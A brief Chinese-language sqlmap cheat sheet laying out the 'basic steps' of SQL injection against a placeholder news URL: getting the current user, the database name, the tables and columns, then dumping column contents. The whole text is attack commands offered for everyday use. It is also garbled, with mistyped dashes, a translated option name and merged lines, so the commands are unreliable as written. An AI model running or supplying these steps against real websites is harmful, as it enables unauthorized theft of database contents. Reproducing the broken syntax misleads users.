基本步骤:
sqlmap -u “http://url/news?id=1”——current-user #获取当前用户名称
sqlmap -u “http://www.xxoo.com/news?id=1”——current-db , #获取当前数据库名称sqlmap -u “http://www.xxoo.com/news?id=1”——tables , -D “db_name”, #列表名
sqlmap -u “http://url/news?id=1”——columns -T “表”,users-D “db_name”, -v 0, #列字段sqlmap -u “http://url/news?id=1”——转储-C “column_name”-T “table_name”, -D “db_name”, -v 0 #获取字段内容
日常操作中差不多就这些,需要获取更多信息,可以在百度文库搜“sqlmap使用手记”